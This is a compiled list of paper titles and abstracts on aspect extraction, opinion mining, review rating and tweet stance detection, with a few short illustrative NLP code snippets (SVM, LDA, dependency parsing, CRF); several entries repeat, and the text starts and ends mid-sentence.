Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Stance and Sentiment in Tweets paper_content: We can often detect from a person's utterances whether he/she is in favor of or against a given target entity -- their stance towards the target. However, a person may express the same stance towards a target by using negative or positive language. Here for the first time we present a dataset of tweet--target pairs annotated for both stance and sentiment. The targets may or may not be referred to in the tweets, and they may or may not be the target of opinion in the tweets. Partitions of this dataset were used as training and test sets in a SemEval-2016 shared task competition. We propose a simple stance detection system that outperforms submissions from all 19 teams that participated in the shared task. Additionally, access to both stance and sentiment annotations allows us to explore several research questions. We show that while knowing the sentiment expressed by a tweet is beneficial for stance classification, it alone is not sufficient. Finally, we use additional unlabeled data through distant supervision techniques and word embeddings to further improve stance classification. --- paper_title: Latent aspect rating analysis without aspect keyword supervision paper_content: Mining detailed opinions buried in the vast amount of review text data is an important, yet quite challenging task with widespread applications in multiple domains. Latent Aspect Rating Analysis (LARA) refers to the task of inferring both opinion ratings on topical aspects (e.g., location, service of a hotel) and the relative weights reviewers have placed on each aspect based on review content and the associated overall ratings. A major limitation of previous work on LARA is the assumption of pre-specified aspects by keywords. However, the aspect information is not always available, and it may be difficult to pre-define appropriate aspects without a good knowledge about what aspects are actually commented on in the reviews. In this paper, we propose a unified generative model for LARA, which does not need pre-specified aspect keywords and simultaneously mines 1) latent topical aspects, 2) ratings on each identified aspect, and 3) weights placed on different aspects by a reviewer. Experiment results on two different review data sets demonstrate that the proposed model can effectively perform the Latent Aspect Rating Analysis task without the supervision of aspect keywords. Because of its generality, the proposed model can be applied to explore all kinds of opinionated text data containing overall sentiment judgments and support a wide range of interesting application tasks, such as aspect-based opinion summarization, personalized entity ranking and recommendation, and reviewer behavior analysis. --- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. 
Tools that rank competing products in terms of the satisfaction of consumers who have purchased the product before are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real-life dataset that we crawled from Epinions.com. --- paper_title: On the evaluation of document analysis components by recall, precision, and accuracy paper_content: In document analysis, it is common to prove the usefulness of a component by an experimental evaluation. By applying the respective algorithms to a test sample, effectiveness measures such as recall, precision, and accuracy are computed. The goal of such an evaluation is two-fold: on the one hand it shows that the absolute effectiveness of the algorithm is acceptable for practical use. On the other hand, the evaluation can prove that the algorithm has a better or worse effectiveness than another algorithm. We argue that experimental evaluation on relatively small test sets (as is very common in document analysis) has to be taken with extreme care from a statistical point of view. In fact, it is surprising how weak the statements derived from such evaluations are. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews are becoming available on the Internet, e.g., in product review forums, discussion groups, and blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera.
It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. As our main contribution, we introduce Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: An Unsupervised Aspect-Sentiment Model for Online Reviews paper_content: With the increase in popularity of online review sites comes a corresponding need for tools capable of extracting the information most important to the user from the plain text data. Due to the diversity in products and services being reviewed, supervised methods are often not practical. We present an unsuper-vised system for extracting aspects and determining sentiment in review text. The method is simple and flexible with regard to domain and language, and takes into account the influence of aspect on sentiment polarity, an issue largely ignored in previous literature. We demonstrate its effectiveness on both component tasks, where it achieves similar results to more complex semi-supervised methods that are restricted by their reliance on manual annotation and extensive knowledge sources. --- paper_title: Support or Oppose? Classifying Positions in Online Debates from Reply Activities and Opinion Expressions paper_content: We propose a method for the task of identifying the general positions of users in online debates, i.e., support or oppose the main topic of an online debate, by exploiting local information in their remarks within the debate. An online debate is a forum where each user post an opinion on a particular topic while other users state their positions by posting their remarks within the debate. The supporting or opposing remarks are made by directly replying to the opinion, or indirectly to other remarks (to express local agreement or disagreement), which makes the task of identifying users' general positions difficult. A prior study has shown that a link-based method, which completely ignores the content of the remarks, can achieve higher accuracy for the identification task than methods based solely on the contents of the remarks. In this paper, we show that utilizing the textual content of the remarks into the link-based method can yield higher accuracy in the identification task. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. 
In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Objective Criteria for the Evaluation of Clustering Methods paper_content: Abstract Many intuitively appealing methods have been suggested for clustering data, however, interpretation of their results has been hindered by the lack of objective criteria. This article proposes several criteria which isolate specific aspects of the performance of a method, such as its retrieval of inherent structure, its sensitivity to resampling and the stability of its results in the light of new data. These criteria depend on a measure of similarity between two different clusterings of the same set of data; the measure essentially considers how each pair of data points is assigned in each clustering. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews become available on the Internet, e.g., product review forums, discussion groups, and Blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera. It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. As our main contribution, we introduce Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: JU_NLP at SemEval-2016 Task 6: Detecting Stance in Tweets using Support Vector Machines paper_content: We describe the system submitted to the SemEval-2016 for detecting stance in tweets (Task 6, Subtask A). One of the main goals of stance detection is to automatically determine the stance of a tweet towards a specific target as ‘FAVOR’, ‘AGAINST’, or ‘NONE’. We developed a supervised system using Support Vector Machines to identify the stance by analyzing various lexical and semantic features. The average F1 score achieved by our system is 60.60. 
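A minimal sketch of the kind of supervised SVM pipeline that systems like the one above describe, written with scikit-learn; the target, the handful of training tweets and the feature choices are invented for illustration and do not reproduce the cited system's feature engineering.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.pipeline import make_pipeline
from sklearn.svm import LinearSVC

# invented examples standing in for stance-annotated tweets on one target
tweets = ["We must act on climate change now",
          "Climate alarmism is exaggerated nonsense",
          "Watching the game tonight"]
stances = ["FAVOR", "AGAINST", "NONE"]

# TF-IDF over word unigrams and bigrams roughly mimics the lexical features such systems use
clf = make_pipeline(TfidfVectorizer(ngram_range=(1, 2), sublinear_tf=True),
                    LinearSVC())
clf.fit(tweets, stances)
print(clf.predict(["Carbon taxes are long overdue"]))
```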
--- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any task-specific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top-performing systems in SemEval-2014. --- paper_title: Aspect Aware Optimized Opinion Analysis of Online Product Reviews paper_content: Nowadays, social media and microblogging sites are among the most popular forms of communication. One of the most useful applications on these platforms is opinion mining, or sentiment classification, of users. In this work, an automated method is proposed to analyze and summarize opinions on a product in a structured, product-aspect-based manner. The proposed method will help future potential buyers acquire a complete picture, from a comprehensible representation of the reviews, without going through all the reviews manually. --- paper_title: Semantic dependent word pairs generative model for fine-grained product feature mining paper_content: In the field of opinion mining, extraction of fine-grained product features is a challenging problem. Nouns are the most important features for representing product features. Generative models such as latent Dirichlet allocation (LDA) have been used for detecting keyword clusters in a document corpus. As adjectives often dominate review corpora, they are often excluded from the vocabulary in such generative models for opinion sentiment analysis. On the other hand, adjectives provide useful context for noun features as they are often semantically related to the nouns. To take advantage of such semantic relations, a dependency tree is constructed to extract pairs of nouns and adjectives with a semantic dependency relation. We propose a semantic dependent word pairs generative model for pairs of nouns and adjectives in each sentence. Product features and their corresponding adjectives are simultaneously clustered into distinct groups, which enables improved accuracy of product features as well as providing clustered adjectives. Experimental results demonstrated the advantage of our models, with lower perplexity and average cluster entropies compared to baseline models based on LDA. Highly semantically cohesive, descriptive and discriminative fine-grained product features are obtained automatically. --- paper_title: Cross-Target Stance Classification with Self-Attention Networks paper_content: In stance classification, the target on which the stance is made defines the boundary of the task, and a classifier is usually trained for prediction on the same target. In this work, we explore the potential for generalizing classifiers between different targets, and propose a neural model that can apply what has been learned from a source target to a destination target. We show that our model can find useful information shared between relevant targets which improves generalization in certain scenarios.
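The noun-adjective pair extraction step that the word-pairs model above builds on can be sketched with an off-the-shelf dependency parser; here spaCy is an assumed tool (not necessarily the one used in the paper), and adjectival-modifier ('amod') links serve as a simple proxy for aspect/opinion word pairs.

```python
import spacy

nlp = spacy.load("en_core_web_sm")  # assumes the small English model is installed

def noun_adj_pairs(text):
    """Collect (noun, adjective) pairs linked by an 'amod' dependency."""
    doc = nlp(text)
    return [(tok.head.text.lower(), tok.text.lower())
            for tok in doc
            if tok.dep_ == "amod" and tok.head.pos_ in ("NOUN", "PROPN")]

print(noun_adj_pairs("The blurry screen ruined an otherwise great camera."))
# expected along the lines of [('screen', 'blurry'), ('camera', 'great')]
```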
--- paper_title: DeepStance at SemEval-2016 Task 6: Detecting Stance in Tweets Using Character and Word-Level CNNs paper_content: This paper describes our approach for the Detecting Stance in Tweets task (SemEval-2016 Task 6). We utilized recent advances in short text categorization using deep learning to create word-level and character-level models. The choice between word-level and character-level models in each particular case was informed through validation performance. Our final system is a combination of classifiers using word-level or character-level models. We also employed novel data augmentation techniques to expand and diversify our training dataset, thus making our system more robust. Our system achieved a macro-average precision, recall and F1-scores of 0.67, 0.61 and 0.635 respectively. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Multi-task Coupled Attentions for Category-specific Aspect and Opinion Terms Co-extraction paper_content: In aspect-based sentiment analysis, most existing methods either focus on aspect/opinion terms extraction or aspect terms categorization. However, each task by itself only provides partial information to end users. To generate more detailed and structured opinion analysis, we propose a finer-grained problem, which we call category-specific aspect and opinion terms extraction. This problem involves the identification of aspect and opinion terms within each sentence, as well as the categorization of the identified terms. To this end, we propose an end-to-end multi-task attention model, where each task corresponds to aspect/opinion terms extraction for a specific category. Our model benefits from exploring the commonalities and relationships among different tasks to address the data sparsity issue. We demonstrate its state-of-the-art performance on three benchmark datasets. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. 
Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: Latent aspect rating analysis without aspect keyword supervision paper_content: Mining detailed opinions buried in the vast amount of review text data is an important, yet quite challenging task with widespread applications in multiple domains. Latent Aspect Rating Analysis (LARA) refers to the task of inferring both opinion ratings on topical aspects (e.g., location, service of a hotel) and the relative weights reviewers have placed on each aspect based on review content and the associated overall ratings. A major limitation of previous work on LARA is the assumption of pre-specified aspects by keywords. However, the aspect information is not always available, and it may be difficult to pre-define appropriate aspects without a good knowledge about what aspects are actually commented on in the reviews. In this paper, we propose a unified generative model for LARA, which does not need pre-specified aspect keywords and simultaneously mines 1) latent topical aspects, 2) ratings on each identified aspect, and 3) weights placed on different aspects by a reviewer. Experimental results on two different review data sets demonstrate that the proposed model can effectively perform the Latent Aspect Rating Analysis task without the supervision of aspect keywords. Because of its generality, the proposed model can be applied to explore all kinds of opinionated text data containing overall sentiment judgments and support a wide range of interesting application tasks, such as aspect-based opinion summarization, personalized entity ranking and recommendation, and reviewer behavior analysis. --- paper_title: Exploiting coherence for the simultaneous discovery of latent facets and associated sentiments paper_content: Facet-based sentiment analysis involves discovering the latent facets, sentiments and their associations. Traditional facet-based sentiment analysis algorithms typically perform the various tasks in sequence, and fail to take advantage of the mutual reinforcement of the tasks. Additionally, inferring sentiment levels typically requires domain knowledge or human intervention. In this paper, we propose a series of probabilistic models that jointly discover latent facets and sentiment topics, and also order the sentiment topics with respect to a multi-point scale, in a language and domain independent manner. This is achieved by simultaneously capturing both short-range syntactic structure and long-range semantic dependencies between the sentiment and facet words. The models further incorporate coherence in reviews, where reviewers dwell on one facet or sentiment level before moving on, for more accurate facet and sentiment discovery. For reviews which are supplemented with ratings, our models automatically order the latent sentiment topics, without requiring seed-words or domain-knowledge. To the best of our knowledge, our work is the first attempt to combine the notions of syntactic and semantic dependencies in the domain of review mining. Further, the concept of facet and sentiment coherence has not been explored earlier either. Extensive experimental results on real-world review data show that the proposed models outperform various state-of-the-art baselines for facet-based sentiment analysis.
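The latent-aspect models summarized above build on topic modeling over review text. The sketch below shows only the plain-LDA building block they extend, using scikit-learn on a few made-up review sentences; the reviews, topic count, and the reading of topics as "aspects" are illustrative assumptions, not a reimplementation of LARA or of the joint facet-sentiment models.

```python
# Illustrative sketch: discover candidate review "aspects" as LDA topics over review sentences.
# All example sentences and the number of topics are toy values.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation

review_sentences = [
    "the battery life is excellent and charging is fast",
    "screen resolution is sharp but the display is dim outdoors",
    "battery drains quickly when the screen brightness is high",
    "customer service replied quickly and the staff were helpful",
]

vectorizer = CountVectorizer(stop_words="english")
counts = vectorizer.fit_transform(review_sentences)

lda = LatentDirichletAllocation(n_components=2, random_state=0)
lda.fit(counts)

# Print the top words per latent topic as rough aspect descriptors.
terms = vectorizer.get_feature_names_out()
for topic_id, weights in enumerate(lda.components_):
    top = [terms[i] for i in weights.argsort()[::-1][:5]]
    print(f"aspect {topic_id}: {top}")
```

The joint models discussed above go further by tying such latent topics to sentiment levels and overall ratings, which plain LDA by itself does not do.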
--- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. Tools that rank competing products in terms of the satisfaction of consumers that have purchased the product before, are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, the number of reviews can be up to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract high detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. 
This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real life dataset that we crawled from Epinions.com. --- paper_title: pkudblab at SemEval-2016 Task 6 : A Specific Convolutional Neural Network System for Effective Stance Detection paper_content: In this paper, we develop a convolutional neural network for stance detection in tweets. According to the official results, our system ranks 1 on subtask B (among 9 teams) and ranks 2 on subtask A (among 19 teams) on the twitter test set of SemEval2016 Task 6. The main contribution of our work is as follows. We design a ”vote scheme” for prediction instead of predicting when the accuracy of validation set reaches its maximum. Besides, we make some improvement on the specific subtasks. For subtask A, we separate datasets into five sub-datasets according to their targets, and train and test five separate models. For subtask B, we establish a two-class training dataset from the official domain corpus, and then modify the softmax layer to perform three-class classification. Our system can be easily re-implemented and optimized for other related tasks. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. 
Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: Structure-Aware Review Mining and Summarization paper_content: In this paper, we focus on object feature based review summarization. Different from most of previous work with linguistic rules or statistical methods, we formulate the review mining task as a joint structure tagging problem. We propose a new machine learning framework based on Conditional Random Fields (CRFs). It can employ rich features to jointly extract positive opinions, negative opinions and object features for review sentences. The linguistic structure can be naturally integrated into model representation. Besides linear-chain structure, we also investigate conjunction structure and syntactic tree structure in this framework. Through extensive experiments on movie review and product review data sets, we show that structure-aware models outperform many state-of-the-art approaches to review mining. --- paper_title: A Joint Model of Text and Aspect Ratings for Sentiment Summarization paper_content: Online reviews are often accompanied with numerical ratings provided by users for a set of service or product aspects. We propose a statistical model which is able to discover corresponding topics in text and extract textual evidence from reviews supporting each of these aspect ratings ‐ a fundamental problem in aspect-based sentiment summarization (Hu and Liu, 2004a). Our model achieves high accuracy, without any explicitly labeled data except the user provided opinion ratings. The proposed approach is general and can be used for segmentation in other applications where sequential data is accompanied with correlated signals. --- paper_title: An Approach Based on Tree Kernels for Opinion Mining of Online Product Reviews paper_content: Opinion mining is a challenging task to identify the opinions or sentiments underlying user generated contents, such as online product reviews, blogs, discussion forums, etc. Previous studies that adopt machine learning algorithms mainly focus on designing effective features for this complex task. This paper presents our approach based on tree kernels for opinion mining of online product reviews. Tree kernels alleviate the complexity of feature selection and generate effective features to satisfy the special requirements in opinion mining. In this paper, we define several tree kernels for sentiment expression extraction and sentiment classification, which are subtasks of opinion mining. Our proposed tree kernels encode not only syntactic structure information, but also sentiment related information, such as sentiment boundary and sentiment polarity, which are important features to opinion mining. Experimental results on a benchmark data set indicate that tree kernels can significantly improve the performance of both sentiment expression extraction and sentiment classification. Besides, a linear combination of our proposed tree kernels and traditional feature vector kernel achieves the best performances using the benchmark data set. 
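Several of the entries above formulate review mining as CRF-based sequence tagging over tokens. Below is a minimal sketch of that setup using the sklearn-crfsuite package, with a toy feature template and hand-made BIO labels for aspect (ASP) and opinion (OPI) spans; the features, labels, and data are illustrative assumptions rather than the feature sets used in the cited papers.

```python
# Minimal sketch of CRF sequence labeling for review mining: each token gets a
# feature dict and a BIO-style aspect/opinion label.
# Requires: pip install sklearn-crfsuite. All features and labels are toy assumptions.
import sklearn_crfsuite

def token_features(tokens, i):
    word = tokens[i]
    return {
        "lower": word.lower(),
        "is_title": word.istitle(),
        "prev": tokens[i - 1].lower() if i > 0 else "<BOS>",
        "next": tokens[i + 1].lower() if i < len(tokens) - 1 else "<EOS>",
    }

sentences = [["The", "battery", "life", "is", "great"],
             ["Terrible", "screen", "though"]]
labels = [["O", "B-ASP", "I-ASP", "O", "B-OPI"],
          ["B-OPI", "B-ASP", "O"]]

X = [[token_features(s, i) for i in range(len(s))] for s in sentences]

crf = sklearn_crfsuite.CRF(algorithm="lbfgs", c1=0.1, c2=0.1, max_iterations=50)
crf.fit(X, labels)
print(crf.predict(X))  # per-token aspect/opinion tags
```

Richer templates (POS tags, dependency relations, word-cluster identifiers) can be added to the feature dictionaries without changing the rest of the pipeline, which is essentially how the feature-rich CRF systems above are built.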
--- paper_title: Dependency-Tree Based Convolutional Neural Networks for Aspect Term Extraction paper_content: Aspect term extraction is one of the fundamental subtasks in aspect-based sentiment analysis. Previous work has shown that sentences’ dependency information is critical and has been widely used for opinion mining. With recent success of deep learning in natural language processing (NLP), recurrent neural network (RNN) has been proposed for aspect term extraction and shows the superiority over feature-rich CRFs based models. However, because RNN is a sequential model, it can not effectively capture tree-based dependency information of sentences thus limiting its practicability. In order to effectively exploit sentences’ dependency information and leverage the effectiveness of deep learning, we propose a novel dependency-tree based convolutional stacked neural network (DTBCSNN) for aspect term extraction, in which tree-based convolution is introduced over sentences’ dependency parse trees to capture syntactic features. Our model is an end-to-end deep learning based model and it does not need any human-crafted features. Furthermore, our model is flexible to incorporate extra linguistic features to further boost the model performance. To substantiate, results from experiments on SemEval2014 Task4 datasets (reviews on restaurant and laptop domain) show that our model achieves outstanding performance and outperforms the RNN and CRF baselines. --- paper_title: An Aspect-Sentiment Pair Extraction Approach Based on Latent Dirichlet Allocation paper_content: Online user reviews have a great influence on decision-making process of customers and product sales of companies. However, it is very difficult to obtain user sentiments among huge volume of data on the web consequently; sentiment analysis has gained great importance in terms of analyzing data automatically. On the other hand, sentiment analysis divides itself into branches and can be performed better with aspect level analysis. In this paper, we proposed to extract aspect-sentiment pairs from a Turkish reviews dataset. The proposed task is the fundamental and indeed the critical step of the aspect level sentiment analysis. While extracting aspect-sentiment pairs, an unsupervised topic model Latent Dirichlet Allocation (LDA) is used. With LDA, aspect-sentiment pairs from user reviews are extracted with 0.86 average precision based on ranked list. The aspect-sentiment pair extraction problem is first time realized with LDA on a real-world Turkish user reviews dataset. The experimental results show that LDA is effective and robust in aspect-sentiment pair extraction from user reviews. --- paper_title: Twitter Stance Detection — A Subjectivity and Sentiment Polarity Inspired Two-Phase Approach paper_content: The problem of stance detection from Twitter tweets, has recently gained significant research attention. This paper addresses the problem of detecting the stance of given tweets, with respect to given topics, from user-generated text (tweets). We use the SemEval 2016 stance detection task dataset. The labels comprise of positive, negative and neutral stances, with respect to given topics. We develop a two-phase feature-driven model. First, the tweets are classified as neutral vs. non-neutral. Next, non-neutral tweets are classified as positive vs. negative. The first phase of our work draws inspiration from the subjectivity classification and the second phase from the sentiment classification literature. 
We propose the use of two novel features, which along with our streamlined approach, plays a key role deriving the strong results that we obtain. We use traditional support vector machine (SVM) based machine learning. Our system (F-score: 74.44 for SemEval 2016 Task A and 61.57 for Task B) significantly outperforms the state of the art (F-score: 68.98 for Task A and 56.28 for Task B). While the performance of the system on Task A shows the effectiveness of our model for targets on which the model was trained upon, the performance of the system on Task B shows the generalization that our model achieves. The stance detection problem in Twitter is applicable for user opinion mining related applications and other social influence and information flow modeling applications, in real life. --- paper_title: Distributed Representations of Words and Phrases and their Compositionality paper_content: The recently introduced continuous Skip-gram model is an efficient method for learning high-quality distributed vector representations that capture a large number of precise syntactic and semantic word relationships. In this paper we present several extensions that improve both the quality of the vectors and the training speed. By subsampling of the frequent words we obtain significant speedup and also learn more regular word representations. We also describe a simple alternative to the hierarchical softmax called negative sampling. ::: ::: An inherent limitation of word representations is their indifference to word order and their inability to represent idiomatic phrases. For example, the meanings of "Canada" and "Air" cannot be easily combined to obtain "Air Canada". Motivated by this example, we present a simple method for finding phrases in text, and show that learning good vector representations for millions of phrases is possible. --- paper_title: Efficient Estimation of Word Representations in Vector Space paper_content: We propose two novel model architectures for computing continuous vector representations of words from very large data sets. The quality of these representations is measured in a word similarity task, and the results are compared to the previously best performing techniques based on different types of neural networks. We observe large improvements in accuracy at much lower computational cost, i.e. it takes less than a day to learn high quality word vectors from a 1.6 billion words data set. Furthermore, we show that these vectors provide state-of-the-art performance on our test set for measuring syntactic and semantic word similarities. --- paper_title: Aspect Term Extraction Based on MFE-CRF paper_content: This paper is focused on aspect term extraction in aspect-based sentiment analysis (ABSA), which is one of the hot spots in natural language processing (NLP). This paper proposes MFE-CRF that introduces Multi-Feature Embedding (MFE) clustering based on the Conditional Random Field (CRF) model to improve the effect of aspect term extraction in ABSA. First, Multi-Feature Embedding (MFE) is proposed to improve the text representation and capture more semantic information from text. Then the authors use kmeans++ algorithm to obtain MFE and word clustering to enrich the position features of CRF. Finally, the clustering classes of MFE and word embedding are set as the additional position features to train the model of CRF for aspect term extraction. The experiments on SemEval datasets validate the effectiveness of this model. 
The results of different models indicate that MFE-CRF can greatly improve the Recall rate of CRF model. Additionally, the Precision rate also is increased obviously when the semantics of text is complex. --- paper_title: Aspect and sentiment unification model for online review analysis paper_content: User-generated reviews on the Web contain sentiments about detailed aspects of products and services. However, most of the reviews are plain text and thus require much effort to obtain information about relevant details. In this paper, we tackle the problem of automatically discovering what aspects are evaluated in reviews and how sentiments for different aspects are expressed. We first propose Sentence-LDA (SLDA), a probabilistic generative model that assumes all words in a single sentence are generated from one aspect. We then extend SLDA to Aspect and Sentiment Unification Model (ASUM), which incorporates aspect and sentiment together to model sentiments toward different aspects. ASUM discovers pairs of {aspect, sentiment} which we call senti-aspects. We applied SLDA and ASUM to reviews of electronic devices and restaurants. The results show that the aspects discovered by SLDA match evaluative details of the reviews, and the senti-aspects found by ASUM capture important aspects that are closely coupled with a sentiment. The results of sentiment classification show that ASUM outperforms other generative models and comes close to supervised classification methods. One important advantage of ASUM is that it does not require any sentiment labels of the reviews, which are often expensive to obtain. --- paper_title: Double 